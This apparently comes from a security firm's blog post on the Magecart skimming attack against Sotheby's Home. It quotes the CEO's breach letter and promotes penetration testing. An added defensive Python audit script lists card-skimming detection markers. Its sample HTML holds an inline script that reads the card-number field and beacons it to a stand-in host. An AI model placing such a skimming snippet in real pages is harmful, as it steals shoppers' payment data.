Sotheby’s Home is latest victim of Magecart hacking technique

On October 10, Sotheby’s Home discovered it had become a victim of the ‘Magecart’ hacking technique. ‘Magecart’ refers to a toolkit of malicious software, deployed by multiple criminal hacker groups, that intercepts payment card information when a user makes a payment through an e-commerce website.

Sotheby’s customers entering their PII (personally identifiable information) during the checkout process may have had their names, emails, and credit card information stolen.
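As an added example (not from the original post and not Sotheby’s own code), this is the kind of baseline check a defender can script against a checkout page to surface an injected script of the sort described above: it inventories the page’s script tags, flags external sources whose host is outside an allowlist, and flags inline blocks that both touch card fields and make a network call. The sample HTML, hostnames and allowlist are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from a page.
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)   # a body may arrive in several chunks
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._buf, self._in_script = [], False

# Co-occurrence of these in one inline script suggests it reads card fields
# and sends them off-site. Heuristic only: every hit needs human review.
SUSPECT_MARKERS = ("cc_number", "cvv", "XMLHttpRequest", "fetch(", "sendBeacon")

def audit_checkout_page(html, allowed_hosts):
    # Returns (finding_type, detail) pairs for scripts outside the baseline.
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname   # relative src -> None (same origin)
        if host is not None and host not in allowed_hosts:
            findings.append(("unexpected_external_script", src))
    for body in p.inline:
        hits = [m for m in SUSPECT_MARKERS if m in body]
        if len(hits) >= 2:
            findings.append(("inline_script_touches_card_fields", ", ".join(hits)))
    return findings

# Constructed sample: one allowed script, one from an unknown host, one inline block.
ALLOWED_HOSTS = {"shop.example"}
SAMPLE_HTML = """<form><input name="cc_number"><input name="cvv"></form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://cdn-analytics.invalid/collect.js"></script>
<script>var n = document.getElementsByName("cc_number")[0].value;
navigator.sendBeacon("https://cdn-analytics.invalid/p", n);</script>"""
```

Run this against a freshly fetched copy of the checkout page on a schedule and diff the findings against the last known-good run; a new entry is the signal worth investigating.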

In a letter to customers, Sotheby’s Home CEO Elizabeth Brown said:

“On October 10, we became aware that an unknown third party had gained unauthorized access to the Sotheby’s Home website and inserted malicious code which, depending on the security settings of your computer, may have transmitted personal information you entered into the website’s checkout form to this third party. Upon discovery, we promptly removed the code, which we believe was present on the website since at least March 2017. Based on our investigation into this incident, however, we cannot be certain as to when the website was first victimized by this attack. Accordingly, in an abundance of caution, we are notifying all Sotheby’s Home website customers (including those who made purchases on the Viyet website) that it is possible that their information has been accessed by an unauthorized party.”

British Airways, Newegg, Ticketmaster, and Vision Direct have also been hit by Magecart. Like those other online retailers, Sotheby’s Home notified customers, implemented additional security safeguards, launched an investigation, and offered online shopping safety tips.

Sadly, the pattern of being attacked, sending a letter to customers, and suffering reputational and financial damage has become all too common, almost expected. Yet it doesn’t have to be that way.

Consider penetration testing

Regular penetration testing helps you find and fix vulnerabilities in web servers, browsers, email clients, POS (point of sale) software, operating systems, and server interfaces before cyber criminals can exploit them.

Penetration tests provide an end-state check to make sure all required security controls have been implemented correctly. They can also be used in the early stages of development of new processing systems to identify potential risks to personal data.

Why conduct a penetration test?

An organization should carry out a penetration test:

  • In response to the impact of a serious breach on a similar organization
  • To comply with a regulation or standard, such as the PCI DSS (Payment Card Industry Data Security Standard) or the EU’s GDPR (General Data Protection Regulation)
  • To ensure the security of new applications, or following significant changes to existing applications or business processes
  • To manage the risks of using a greater number and variety of outsourced services
  • To assess the risk of critical data or systems being compromised

There are four types of penetration test, each focusing on a particular aspect of an organization’s logical perimeter.

Download our Green Paper

Learn how to protect your organization’s networks and web applications by reading our detailed penetration testing green paper. Download the green paper here.